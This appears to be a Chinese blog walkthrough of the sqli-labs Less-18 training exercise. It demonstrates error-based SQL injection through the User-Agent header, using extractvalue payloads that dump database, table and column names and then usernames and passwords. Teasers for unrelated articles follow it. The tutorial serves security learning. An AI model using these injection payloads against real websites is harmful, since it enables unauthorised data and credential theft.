sql_lab之sqli中的head头注入,less18

报错注入中的head注入(less-18)

1.输入用户名和密码123 123显示登录错误

2.输入用户名和密码123’ 123显示登录错误

则证明不是普通报错注入,因为有用户名和密码框,如果不是普通报错注入则尝试head注入

3.用burp进行爆破(因为head注入需要登录成功后才能进行查询)

  用户名123,密码0 因为对用户名进行爆破

结果为

同理也可使用密码admin对用户名进行爆破

4.抓出登录成功后的包

对每个地方进行尝试找出报错点

5.查找报错点

在User-Agent: 里面输入1

有回显

6.尝试在User-Agent里面输入内容进行爆破注入

(1)判断注入类型

输入User-Agent: 1'

报错显示 near '127.0.0.1', 'admin')' 说明是’)闭合

且应 写为(‘1’,’2’,’3’):其中1代表报错点,2表示127.0.0.7,3表示admin

(2)查询数据库名

用User-Agent: 1'and extractvalue('1',concat('~',(select database()),'~')),123,123) -- s 查出

所以数据库名为security

(3)查询表名

User-Agent: 1'and extractvalue('1',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security'),'~')),123,123) -- s

XPATH syntax error: '~emails,referers,uagents,users~'

所以表名为emails,referers,uagents,users

(4)查询字段名

User-Agent: 1'and extractvalue('1',concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),'~')),123,123) -- s

XPATH syntax error: '~id,username,password~'

所以字段名为id,username,password

(5)查询username和password

User-Agent: 1'and extractvalue('1',concat('~',(select group_concat(username) from users))),123,123) -- s

查找出用户名为XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'

User-Agent: 1'and extractvalue('1',concat('~',(select group_concat(password) from users))),123,123) -- s

查找出密码为XPATH syntax error: '~Dumb,I-kill-you,p@ssword,crappy'

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/292706.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

P2 H264码流结构分析——Annexb与MP4格式的区别 (中)

前言 从本章开始我们将要学习嵌入式音视频的学习了 ,使用的瑞芯微的开发板 🎬 个人主页:ChenPi 🐻推荐专栏1: 《C_ChenPi的博客-CSDN博客》✨✨✨ 🔥 推荐专栏2: 《Linux C应用编程(概念类)_Ch…

图像畸变校正解决方案,无畸变的高质量视觉体验

摄像头已经成为我们生活中不可或缺的一部分。然而,由于摄像头的物理特性和环境因素,采集到的图像往往存在径向和切向畸变,导致画面扭曲,影响视觉效果。为了解决这个问题,美摄科技推出了一款先进的图像畸变校正解决方案…

亚洲诚信TrustAsia成功入选《第十四批上海市重点商标保护名录》

近日,为进一步加大注册商标专用权的保护力度,上海市知识产权局制定并发布了《第十四批上海市重点商标保护名录》,亚数信息科技(上海)有限公司(以下简称亚数)榜上有名,注册商标“亚洲…

健身俱乐部官网搭建的作用是什么

健身俱乐部是不少人常去场所,以会员和散客为主,这些场所在大城市商圈中较为常见也有很高的需求度,入局商家也比较多,但在实际经营中商家们也会不可避免的面临一些难题。 1、拓客难 健身俱乐部客群有一定年龄限制,同时…

面试高频的TCP知识点总结,比我想象得还要详细

下午好,我的网工朋友。 TCP 作为传输层的协议,了解它,拿下它,是一个网络工程师素养的体现,也是面试中经常被问到的知识点。 我们账号之前的文章里也写过不少关于TCP相关的文章,感兴趣的朋友们可以点击下方…

【数据结构】九、排序

目录 一、排序概述 二、插入排序 2.1直接插入排序 2.2折半插入排序 2.3二路插入排序 2.4表插入排序 2.5希尔排序 三、交换排序 3.1冒泡排序 3.2快速排序 四、选择排序 4.1简单选择排序 4.2锦标赛排序 4.3堆排序 五、归并排序 六、基数排序 七、总结 一、排序概述…

接口测试用例设计(超详细总结)

一、为什么要写接口测试用例? (1)理清思路,避免漏测和重复测试。 (2)提高测试效率、跟进测试进度、告诉领导做过、跟进重复性工作。 (3)更好的记录问题、发现问题、复现问题、同时…

在Latex中显示中文

推荐由overleaf提供的Latex学习材料:Chinese - Overleaf, Online LaTeX Editor 推荐使用XeLaTeX或者LuaLaTeX编译器(compilers),因为它们直接支持UTF-8编码文本并使用TrueType和OpenType字体。 目录 一、使用ctexart document类 (推荐使用…

24年5月软考软件设计师考哪些内容,考试大纲什么的?

一、考试方式和考点范围(如图) 上午题:只有单选题下午题:案例分析题 上午题:总分75分,45分及格,每题1分,共75题,考试知识点范围广,必考5分全英文题 下午题…

Baumer工业相机堡盟工业相机如何通过BGAPI SDK实现Raw格式的图像保存(C#)

Baumer工业相机堡盟工业相机如何通过BGAPI SDK实现Raw格式的图像保存(C#) Baumer工业相机Baumer工业相机通过SDK实现Raw格式的图像保存的技术背景通过SDK获取相机信息的代码分析Baumer工业相机回调函数里保存原始图像数据Baumer保存Raw图像格式重要核心代…

27、ResNet50处理STEW数据集,用于情感三分类+全备的代码

1、数据介绍 IEEE-Datasets-STEW:SIMULTANEOUS TASK EEG WORKLOAD DATASET : 该数据集由48名受试者的原始EEG数据组成,他们参加了利用SIMKAP多任务测试进行的多任务工作负荷实验。受试者在休息时的大脑活动也在测试前被记录下来,也包括在其…

15-deoxy-Δ12,14-PGJ2 ELISA kit

首款上市的15-d-PGJ2 ELISA试剂盒,可用于类花生酸研究 15-deoxy-Δ12,14-PGJ2(15-d-PGJ2)是PGD2的最终脱水产物之一,通过中间体Δ12-PGJ2形成。生理条件下,15-d-PGJ2存在于体液中,浓度介于10^(-12)至10^(-9…